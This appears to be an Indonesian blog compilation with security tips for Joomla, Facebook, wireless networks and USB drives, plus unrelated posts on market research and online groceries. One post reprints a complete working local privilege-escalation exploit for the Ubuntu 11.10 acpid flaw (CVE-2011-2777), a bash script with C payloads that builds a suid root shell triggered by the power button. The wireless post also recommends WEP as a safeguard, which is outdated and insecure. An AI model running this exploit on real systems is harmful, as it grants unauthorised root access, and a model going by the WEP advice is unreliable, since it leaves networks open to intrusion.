Cara Mengamankan Joomla dari Hacker

 (Keamanan Komputer)

Cara Mengamankan Joomla dari Hacker

Dengan adanya Content Management System (CMS) open source seperti Mambo / Joomla, Drupal, Xoops, dll, kita sangat dimudahkan terutama yang kurang memahami bahasa pemrograman untuk memiliki website, blog, pribadi yang interaktif, namun menggunakan software tersebut ada untung dan ruginya. Untungnya kita ga perlu capek-capek membuat CMS.
Ruginya semua yang pake CMS tersebut juga tahu source code website kita. Jadi lebih rentan terhadap serangan-serangan hacker. disini adalah beberapa tips yang untuk mengamankan situs Mambo / Joomla dari serangan hacker :

1. Rename file configuration.php menjadi nama lain. Agak repot sih, kita jadi harus ubah beberapa file di Mambo / Joomla, tapi ini ga seberapa dibanding kalo website kita dibobol orang. Kalo perlu file yang dah direname tsb, kita protect lagi di .htaccess supaya tidak bisa diakses dari browser. Trus kalo bisa file tersebut jgn di chmod ke 777, begitu kita selesai mengubah Global Configuration di halaman admin Mambo / Joomla, jangan lupa untung mencentang option “Make unwriteable after saving”.
2. Begitu Mambo / Joomla sudah terinstal, hapus file configuration.php-dist, file ini berisi data konfigurasi default Mambo dan bisa di akses lewat browser
3. Lindungin direktori administrator menggunakan .htpaswd
4. Hapus folder Instalation.
5. Hapus semua tulisan yang memberitahu user kalo website  pake Mambo / Joomla.
6. Selalu ikuti perkembangan Mambo / Joomla
7. Non aktifkan username “admin”, karena “admin” adalah username default bawaan dari Mambo/Joomla.

Celah Keamanan Ubuntu 11.10 ACPID

(Keamanan Komputer)

Celah Keamanan Ubuntu 11.10 ACPID

Baru-baru ini ditemukan celah keamanan pada ubuntu yang terpasang utilitas Acpid untuk versi Ubuntu 11.10. Acpid adalah sebuah Utilitas pada linux guna mendukung ACPI (Advanced Configuration and Power Interface) untuk manajemen daya, manajeman suhu pada mobile, desktop, dan server.

Exploit akan berjalan ketika kita menekan tombol power sehingga memungkinkan untuk mendapatkan privileges dari user yang sedang aktif saat itu.

1. ##################################################################
2. # Exploit Title: Acpid Privilege Boundary Crossing Vulnerability #
3. # Google Dork:                                                   #
4. # Date: 23-11-2011                                               #
5. # Author: otr                                                    #
6. # Software Link: https://launchpad.net/ubuntu/+source/acpid      #
7. # Version: 1:2.0.10-1ubuntu2                                     #
8. # Tested on: Ubuntu 11.10, Ubuntu 11.04                          #
9. # CVE : CVE-2011-2777                                            #
10. ##################################################################
11.  
12. #!/bin/bash
13. PAYLOADEXE="/var/crash/payload"
14. PAYLOADC="/var/crash/payload.c"
15. KDEDC="kded4.c"
16. KDEDEXE="kded4"
17. TRIGGER="/etc/acpi/powerbtn.sh"
18. rm -f $PAYLOADEXE $KDEDEXE $KDEDC $PAYLOADC
19. echo "[+] Setting umask ke 0 untuk writable files."
20. umask 0
21.  
22. echo "[+] Preparing binary payload."
23. # mencoba untuk mendapatkan suid root shell, jika tidak kita hanya akan mendapatkan
24. # shell dari user lain
25. cat > $PAYLOADC <<_EOF
26. #include <sys/stat.h>
27. void main(int argc, char **argv)
28. {
29.     if(!strstr(argv[0],"shell")){
30.         printf("[+] Preparing suid shell.\n");
31.         system("cp /var/crash/payload /var/crash/shell");
32.         setuid(0);
33.         setgid(0);
34.         chown ("/var/crash/shell", 0, 0);
35.         chmod("/var/crash/shell", S_IRWXU | S_IRWXG | S_IRWXO | S_ISUID | S_ISGID);
36.     }else{
37.         execl("/bin/sh", "/bin/sh", "-i", 0);
38.     }
39. }
40. _EOF
41. gcc -w -o $PAYLOADEXE $PAYLOADC
42.  
43. echo "[+] Preparing fake kded4 process."
44. cat > $KDEDC <<_EOF
45. #include <unistd.h>
46. void main (){
47.     while(42){
48.         sleep(1);
49.         if( access( "/var/crash/shell" , F_OK ) != -1 ) {
50.             execl("/var/crash/shell", "/var/crash/shell", "-i", 0);
51.             exit(0);
52.         }
53.     }
54. }
55. _EOF
56.  
57. gcc -w -o $KDEDEXE $KDEDC
58. rm -f $KDEDC $PAYLOADC
59.  
60. echo "[+] Exporting DBUS_SESSION_BUS_ADDRESS."
61. export DBUS_SESSION_BUS_ADDRESS="xxx & $PAYLOADEXE"
62.  
63. echo "[+] Starting kded4."
64. echo "[+] Trying to PMS the system."
65. echo "[+] Menunggu Tombol power di tekan ."
66. echo "[+] anda akan mendapatkan shell pada console ini."
67. ./$KDEDEXE
68.  
69. rm $KDEDEXE

Tips Mengamankan Akun Facebook dari Hacking

 (Keamanan Komputer)

Tips Mengamankan Akun Facebook dari Hacking

1. Buat Enable Secure Browsing pada facebook:
Facebook kini telah mendukung fasilitas SSL encryption (https--Hypertext Transfer Protocol Secure) untuk semua akses browsing ke situs facebook, dan sebaiknya anda aktifkan jika anda sedang browsing dari tempat umum seperti cafe, hotel, bandara, atau dengan fasilitas hot spot yang menggunakan akses point umum.
Jika settingan pada facebook anda belum aktif, maka berikut adalah cara untuk mengaktifkannya:

Masuk ke Account Setting, klik pada ikon security yang berada di sebelah kiri lalu pilih Secure Browsing *Edit. Beri tanda centang pada "Browse Facebook on a secure connection (https) when possible." Lalu klik Save Changes, 

2. Aktifkan Login Notifications
Mengaktifkan login notifications akan memberitahukan kepada anda ketika Akun facebook anda sedang diakses oleh perangkat lain. Caranya sama seperti tip 1 di atas, tetapi kali ini pilih pada Notifications. Jika ada orang lain selain anda yang mengakses akun anda, maka anda akan memperoleh pemberitahuan melalui e-mail.

Jika Anda belum mengaktifkan Login notifications pada settingan facebook anda, maka berikut ini adalah cara untuk mengaktifkannya: Masuk ke Account Setting, klik pada ikon security yang berada di sebelah kiri lalu pilih Secure Browsing *Edit. Beri tanda centang pada "Email and Text message/Push 

3. Gunakan App Passwords:
App passwords adalah  one-time passwords  yang Anda gunakan untuk login ke aplikasi Anda, tanpa perlu memasukkan password Facebook. Untuk mendapatkannya, masuk ke Setting Account, kemudian pilih tab Security. Klik "Edit" di samping App Passwords, lalu ikuti petunjuknya.

Saran saya, anda harus berhati-hati dan meninjau ulang izin yang anda berikan kepada aplikasi Facebook sebelum menginstal dan menggunakannya.

4. Hati-hati dengan apa yang anda tulis(share):
Informasi yang anda bagi(tulis) dalam profile anda kadang-kadang bisa dimanfaatkan oleh hacker dalam menjalankan aksinya. Misalkan informasi tentang tanggal lahir anda yang biasanya dipakai sebagai pertanyaan untuk keamanan pasword anda.
Berikut ada beberapa cara yang bisa kita lakukan:
Arahkan ke halaman Privacy Setting Page (Pengaturan Privasi) Anda dan klik "Edit  Setting" di samping"How Tags Work."

5. Teratur untuk mengganti password yang anda Pakai:
Kita biasanya mengabaikan hal ini, tetapi jika Anda mendapatkan peringatan tentang seseorang mengakses account Anda selain Anda, atau melihat postingan aneh tanpa anda pernah menulisnya, kemungkinan besar ada orang yang ingin meng "hack" anda. Langkah pertama yang anda ambil adalah sesegera mungkin untuk mengganti password akun facebook anda.

6. Jangan pernah mencoba untuk menginstal aplikasi untuk menghapus timeline Anda

7.  Log Out dari Facebook Ketika Anda Sudah Selesai :

Setelah selesai browsing Facebook, pastikan Anda log out. Ini akan mencegah ancaman, seperti 'Likejacking, "yang memanfaatkan log-in sesi ke Facebook.

8. Jangan aktifkan Pengingat Password (Remember Password) pada browser Anda bila berada di tempat umum:

Jika hal ini terjadi atau anda lupa untuk sign out, maka anda dapat log out jarak jauh, caranya: Dari halaman Pengaturan Akun (Account Setting), klik tab "Security" di sebelah kiri. Pilih "Edit" di sebelah  "Active Sessions". 

Informasi di atas akan menunjukkan tempat Anda login pada sebuah komputer, ketika Anda terakhir mengakses akun facebook anda dari komputer tersebut. Untuk log out dari salah satu sesi, cukup klik " End Activity ." 

9. Hindari Penggunaan Aplikasi yang tidak perlu: 

Cobalah untuk menghindari menggunakan aplikasi pihak ketiga yang tidak terpercaya. Hal ini bisa menjadi penyebab dari hilangnya akun facebook anda. Karena dengan mengijinkan pihak ketiga mengakses, maka mereka dapat mengakses informasi pribadi Anda seperti email id, hal ini dapat membantu hacker untuk menghack Id Facebook anda.

10. Jadilah Smart dan Jangan klik dan link Mencurigakan:
Gunakan kualitas perangkat lunak keamanan yang baik - anti-virus, anti-malware untuk melindungi dari Trojan akses key-logger atau remote (RAT). Jika Andamenemukan link yang mencurigakan atau link video porno di dinding, Jangan bereksperimen, langsung dihapus saja.

Cara Mengamankan Jaringan Wireles dari Hacker

(Keamanan Komputer)

Cara Mengamankan Jaringan Wireles dari Hacker

Alasan utama untuk mengamankan jaringan nirkabel adalah untuk menghentikan seseorang yang tidak memiliki izin untuk menggunakan Jaringan. Lebih sulit untuk mengamankan jaringan nirkabel dari hacker dibandingkan dengan jaringan kabel klasik. Hal ini disebabkan oleh kenyataan bahwa jaringan nirkabel dapat diakses di mana saja dalam berbagai antena.

Untuk mengamankan jaringan nirkabel dari hacker, kita harus mengambil langkah-langkah yang tepat untuk membuat proteksi terhadap masalah keamanan. Jika Anda jaringan nirkabel tidak aman dari hacker, Anda mungkin berakhir tanpa layanan. Konsekuensinya juga mungkin mencakup pemanfaatan jaringan anda untuk serangan jaringan yang lebih lanjut. Untuk mengamankan jaringan nirkabel dari hacker, Anda dapat mengikuti tips untuk mengamankan jaringan nirkabel berikut ini :

Penempatan Antena yang Strategis :

Hal pertama yang harus Anda lakukan adalah posisi jalur akses antena harus di letakkan di tempat yang membatasi jangkauan sinyal agar tidak melangkah lebih jauh dari area yang dibutuhkan. Anda tidak perlu menempatkan antena dekat jendela kaca karena tidak akan dapat menghambat sinyal tersebut. Tempatkan antena di satu lokasi pusat gedung.

Gunakan WEP:

WEP adalah singkatan dari protokol Wireless enkripsi. Ini adalah alat teknik untuk mengenkripsi lalu lintas di jaringan nirkabel. Anda tidak boleh melewatkannya yang akan memungkinkan hacker untuk mendapatkan akses instan lalu lintas melalui jaringan nirkabel anda.

Mengubah SSID, menonaktifkan SSID:

SSID adalah singkatan dari service set identifier. Itu adalah jalur yang digunakan untuk pengakuan oleh titik akses nirkabel agar pelanggan mampu untuk melakukan sambungan. Untuk setiap titik akses nirkabel diatur, pilih eksklusif serta SSID yang unik. Juga, jika itu dicapai, menahan siaran SSID yang di atas antena. Ini muncul dalam daftar jaringan yang ditawarkan, sementara mampu memberikan pelayanan seperti biasa.

Nonaktifkan DHCP :

Dengan cara ini, hacker akan bekerja keras untuk memecahkan parameter TCP/IP, subnet mask serta alamat IP untuk menghack jaringan nirkabel Anda.

Menonaktifkan atau memodifikasi pengaturan SNMP :

Mengubah setting serta pengaturan SNMP untuk pengguna jaringan. Anda juga dapat menonaktifkannya. Jika tidak para hacker akan dapat menggunakan SNMP untuk mendapatkan info yang signifikan tentang jaringan nirkabel Anda.

Memanfaatkan daftar akses :

untuk keamanan tambahan pada jaringan nirkabel Anda, dan jika jalur akses Anda mendukung fitur ini, gunakan daftar akses. Daftar akses memungkinkan kita menentukan dengan tepat mesin yang diperkenankan untuk lampiran ke salah satu jalur akses. Jalur akses yang termasuk daftar akses dapat menggunakan protokol file transfer sederhana (TFTP) saat ini dan seterusnya dalam rangka untuk men-download daftar diperbaharui untuk menghindari para hacker.

Tips Melindungi Flashdisk tanpa antivirus

(Keamanan Komputer )

Tips Melindungi Flashdisk Tanpa antivirus

 

Flashdisk menjadi media penyimpanan data yang paling sering digunakan. Mudah dibawa kemana-mana, mudah disimpan dan tidak membutuhkan tempat khusus untuk membawanya. Flashdisk sangat rentan tertular virus dan menularkan virus. Jadi, bagaimana cara mencegah flashdisk Anda agar tidak tertular virus dan menjadi sarang virus?

LANGKAH SINGKAT :

1. Buat folder autorun.inf di flashdisk
2. Buat file dengan karakter unik di folder autorun.inf

LANGKAH DETAIL :

1. Buatlah sebuah folder dengan nama “autorun.inf” (tanpa kutip) dalam flashdisk.
2. Masuklah folder autorun.inf tersebut kemudian buatlah file dari notepad dengan cara klik kanan di tempat kosong pilih New pilih Text Document dan berilah nama sesuka Anda, misal coba.txt
3. Bukalah program CHARACTER MAP dengan cara masuk START kemudian ALL PROGRAMS, ACCESORIES, SYSTEM TOOLS, dan CHARACTER MAP.
4. Setelah CHARACTER MAP terbuka, pilih font yang berakhiran Unicode, misal Arial Unicode. Scroll kebawah sampai terlihat huruf-huruf unik seperti tulisan China.
5. Pilih 5 atau lebih karakter atau huruf China yang Anda inginkan, klik dua kali tiap kali Anda memilihnya. Setelah selesai klik tombol Copy.
6. Rubahlah nama file coba.txt dengan karakter unik pada step 5 tadi dengan cara kembalilah ke flashdisk Anda, masuklah ke folder autorun.inf, klik kanan pada file coba.txt, pilih rename, kemudian tekan secara bersama-sama Ctrl+V. (Jika keluar karakter kotak-kotak abaikan saja)
7. Selamat, anda telah mempelajari tips mudah cara melindungi flashdisk dari virus.

Penjelasan singkat : folder Autorun.inf yang Anda buat tadi akan memblokir virus membuat file autorun.inf yang mengangkut virus. Virus yang cerdas akan berusaha menghapus folder autorun.inf, tetapi karena di dalamnya ada file dengan karakter atau tulisan unik tadi, virus tidak akan bisa menghapusnya

RISET PASAR

Riset pasar merupakan cara untuk menemukan pasar potensial dimana produk yang kita jual dapat diterima oleh calon konsumen dan riset pasar merupakan suatu keharusan dalam bisnis online. Riset pasar dapat menyediakan informasi mengenai kebiasaan membeli, kebutuhan, preferensi dan pendapat mengenai nasabah dan calon nasabah yang ada. Oleh karena itu, riset pasar merupakan sesuatu yang sangat penting dalam bisnis online. Pada prinsipnya pasar online tidak jauh berbeda dengan pasar konvensional, di situ ada permintaan dan ada penawaran, ada pembeli dan ada penjualnya, dan yang tidak kalah penting adalah ada persaingannya juga.

Contoh Riset pasar yaitu dapat menggunakan survei secara online adalah cara yang sederhana dan murah untuk mengumpulkan bukti yang bersifat nyata serta menghimpun pendapat dan preferensi masyarakat. Survei secara online akan mendapat respon yang luar biasa jika metode riset pemasaran ini disuguhkan secara positif. Melalui situs web anda, anda dapat memasukkan beberapa pertanyaan untuk memperoleh komentar dan saran dari pengunjung situs web, terutama para customer.

 Tujuan dilakukannya riset pasar adalah Mendesain produk-produk yang lebih responsif terhadap kebutuhan pasar karena hanya dengan memahami segmen-segmen yang responsif terhadap suatu pasarlah kita dapat mendesain suatu produk yang sesuai dengan kebutuhan pasar. tekniknya dapat dilakukan dengan cara menemukan kata kunci ( pasar online ) yang banyak dicari pengguna internet, namun tingkat persaingannya kecil. Tingkat persaingan atas kata kunci diukur dengan hasil pencarian setelah kata kunci tersebut diketikkan pada search engine misalnya google.

Menurut saya, riset pasar sangat penting dalam membangun sebuah toko online karena dengan adanya riset pasar terlebih dahulu, kita dapat mengetahui trend-trend apa saja yang sedang berkembang sehingga kita dapat mendesain produk sesuai dengan permintaan pasar. Jadi dengan ini setidaknya kita dapat menyaingi kompetitor lainnya dan hal yang paling penting adalah andaikan kita memproduksi suatu barang tanpa melakukan riset pasar terlebih dahulu, setelah diproduksi, ternyata barang tersebut tidak laku, maka tentu kita akan rugi, jadi sebaiknya melakukan riset pasar terlebih dahulu sehingga kita tahu akan permintaan pasar dan kita dapat memproduksi sesuai dengan keinginan pasar tersebut.

Pengertian

E-Grocer Merupakan toko online yang menjual sebagian besar kategori barang nya adalah kebutuhan sehari-hari, freshfood, barang tahan lama, makanan yang tahan lama, minuman kaleng, kosmetik, dan barang-barang rumah tangga. Umumnya e-grocery yang sudah mapan adalah yang berbasis grocery retailers, dimana mereka menjual lebih dari 60% dari bauran produk yang merupakan kebutuhan pokok, kebutuhan harian, kebutuhan keluarga, atau kebutuhan rumah tangga .

Contoh E-Grocer:

E-Grocy.com

 

 Peapod.com

 

Publicdirect.com

 

Whyrounout.com

Kendala yang di hadapi e grocery

Setiap usaha memiliki kendala tersendiri. Kendala dari e-grosir ini seperti biasanya dikarenakan persediaan barang yang kurang laku terlalu banyak dari pada yang sering keluar yang mengakibatkan stok barang menumpuk dan lain-lain. Selain itu juga tidak baik jika stok barang yang kosong mengakibatkan pembeli beralih ke e-grocery lainnya.

Kendala lainnya adalah masalah dengan delivery produk kepada pembeli sehingga akan menjadi kebutuhan utama untuk bermitra dengan perusahaan yang memiliki sistem pengiriman produk yang professional. 

 

Perkembangan e-grocery

Diperkirakan perkembangan e-grocery akan terus meningkat dikarenakan semakin banyaknya pengguna internet,  semakin mudah dan murahnya koneksi internet dan juga semakin gampangnya membuat toko online berbentuk e-grocery baik menggunakan jasa oranglain atau membuat sendiri toko online tersebut. Untuk di Indonesia, sepertinya toko online berbentuk e-grocery baru bermunculan belakangan ini di karenakan beberapa hal seperti bisnis toko online seperti e-grocery sangat flexibel, jangkauan toko sangat luas, tidak tergantung jarak dan waktu, dapat mencari pendapatan lain dari iklan/banner yang dipasang di web kita.